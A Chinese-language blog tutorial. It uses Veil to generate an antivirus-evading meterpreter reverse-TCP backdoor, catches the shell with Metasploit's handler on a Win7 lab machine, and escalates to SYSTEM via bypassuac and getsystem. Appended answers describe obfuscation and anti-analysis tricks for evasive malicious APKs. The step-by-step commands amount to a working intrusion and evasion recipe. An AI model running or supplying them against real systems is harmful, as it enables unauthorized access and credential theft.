免杀Payload生成工具Veil的下载与使用

免杀Payload生成工具Veil的下载与使用

Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件

————
————

下载Veil

kali 中输入指令 apt-get install veil 下载 veil(需要挺久)
请添加图片描述

下载可能会出现错误,我这里提示了可能解决问题的指令。其它问题无法下载也可能需要换软件源。
请添加图片描述

我这里页面显示这个,大概是说升级了libpam、libc、libssl等exe库,需要重新启动服务,就直接选Yes 了。
请添加图片描述

重启服务之后我尝试输入 veil 看有没有装好,又让我确认是否安装。(前面执行了下载的指令难道只是在升级某些库)
输入 y 确定 (又需要挺久)
请添加图片描述

不停地下载,等过程结束,弹出这个,让我安装 python3,应该是下载veil必走过程,后面还有两个模块。
请添加图片描述

默认一直next
请添加图片描述

next
请添加图片描述

finish
请添加图片描述

然后弹出界面要求安装pywin32-218模块
请添加图片描述

默认下一步
请添加图片描述

下一步
请添加图片描述

结束
请添加图片描述

弹出界面提示需要安装pycrypto-2.6模块
请添加图片描述

下一步
请添加图片描述

next
请添加图片描述

上面的等待下载过了很久很久,包含但不仅限于上面几个东西,可能是我的kali有些问题,过程中安装了比较多的东西。
结束后输入 veil 回显如图,即安装成功。
可以看到, veil 自带两个 tools 。并且后面还给出了可用的命令:

exit ——退出veil
info ——工具信息
list —— 列出可用的工具
options —— 显示veil配置
update ——更新veil
use ——使用某个 tool

请添加图片描述

————
————

veil 生成免杀 payload

接下来就开始使用veil 生成免杀 payload
使用第一个tool:

use 1

看到装载了41个 payloads
请添加图片描述

list 可查看这 41个payload 分别是是什么。
请添加图片描述

这里尝试使用第7个:c/meterpreter/rev_tcp.py

use 7

给出了一些需要配置的选项,还有可用命令。
请添加图片描述

设置 LHOST为本地 kali 的IP:

set LHOST 192.168.43.125

options再次查看配置信息,可以看到 lhost 已经配置好了。lport端口默认4444,无需配置。
请添加图片描述

输入 generate 执行payload ,显示让我们 给命令中指定一个文件名:backup(自己设定)
请添加图片描述

可以看到生成了 可执行文件backup.exe
请添加图片描述

在文件中找到可执行文件: /var/lib/veil/output/compiled/backup.exe
请添加图片描述

我尝试把这个 exe 后门文件拿出来,但是在win10里马上就被查杀了,然后放进装了360的win7里也会被查杀。(貌似这免杀不够强啊)

————
————

使用 payload 进行渗透攻击

虽然生成的后门文件无法免杀,但这里还是结合 msf 测试一下进行攻击。
靶机:win7
打开 msf ,使用 handler模块

use exploit/multi/handler

请添加图片描述

也给出了 payload :generic/shell_reverse_tcp

set payload windows/meterpreter/reverse_tcp

然后 options 查看配置项,设置 LHOST :

set LHOST 192.168.43.125

请添加图片描述

启动渗透攻击: exploit
然后我把那个后门文件 backup.exe 放在 win7靶机上,添加信任不被免杀,并运行 backup.exe ,然后回到kali ,就可以看到下图中所示信息, 打开了一个Meterpreter会话。
请添加图片描述

执行 shell 命令,可以看到进入了 win7 的命令行操作下,并看到win7用户名 Goodric 。
请添加图片描述

exit 退出命令行模式,getuid 查看当前权限为普通用户权限。要进行更深入的操作,还要进行提权。
请添加图片描述

————
————

结合 msf 的 bypassuac模块提权

这里测试用Metasploit中的bypassuac模块绕过UAC(用户访问控制),提升用户权限。
Metasploit的一些简单使用在之前写过:利用虚拟机复现漏洞 “永恒之蓝”

先把前面正在运行的handler模块放在后台:

background

回显提示在 session 1

也可以查看后台运行的会话:

sessions

请添加图片描述

使用bypassuac模块,并查看可配置的选项参数:

use exploit/windows/local/bypassuac

options
设置SESSION选项参数:

set session 1

请添加图片描述

exploit 启动渗透攻击
可以看到又进入了一个 meterpreter 会话。
请添加图片描述

getuid 查看当前权限为普通用户,getsystem 获取系统权限(最高权限),成功,再次 getuid 查看当前权限显示为 system 系统权限。
系统权限之后就可以进行各种操作了,获取密码等待。
请添加图片描述

  • 3
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: Msfvenom是开源安全工具Metasploit中的一个强大的工具,用于生成恶意文件。通过它可以生成各种类型的恶意文件,包括可执行文件、脚本、payload等。其中,在生成Android平台上的恶意文件时,最常用的是apk格式。Msfvenom生成apk文件的主要目的是用于在渗透测试或红队行动中进行攻击或利用。 想要绕过Android平台上的杀毒软件,需要对apk文件进行免杀处理。Msfvenom在生成apk文件时,可以设置一些参数来达到免杀的目的。比如说,可以指定恶意应用使用的一些系统权限和组件,以逃避杀毒软件的检测。还可以在生成payload时添加混淆(obfuscation)代码,使恶意代码更难被发现和分析。 Msfvenom还提供了一些其他的功能,如生成多个Paylod以及生成免杀的多平台Payload等。需要注意的是,使用Msfvenom生成一个完全免杀的apk是非常困难的。因为安全厂商会不断更新库以便检测恶意应用,开发者需要不断更新代码以保持攻击效果。 总的来说,Msfvenom是一款攻击能力强大的工具,但其需要谨慎使用,并且需要经过深入的学习和实践进行掌握。为了避免利用该工具进行恶意攻击,使用人员应当是经过事先明确授权的安全专业人员。 ### 回答2: MSFVenom是Metasploit框架中的一个模块,它可用于生成各种类型的恶意软件。其中,生成的APK免杀的原理主要是通过修改APK的元数据信息和代码,使之不被杀毒软件所识别。 具体来说,生成APK免杀的步骤如下: 首先,使用MSFVenom生成APK恶意软件,可以自定义恶意软件的功能和载荷类型。 然后,根据需要修改APK的元数据信息,如软件名称、版本号、签名等,以此来欺骗杀毒软件的识别机制。 接下来,对APK的代码进行混淆和加密处理,使其难以被分析和检测。常用的混淆和加密工具包括ProGuard、DexGuard、Jadx等。 最后,通过在恶意软件中植入反调试和动态加载技术等手段,进一步增强其免杀能力。 需要注意的是,在使用MSFVenom生成APK免杀的过程中,应当遵守法律法规,不得用于非法用途,以免触犯相关法律。同时,建议加强网络安全意识,加强网络安全防范,以免受到攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值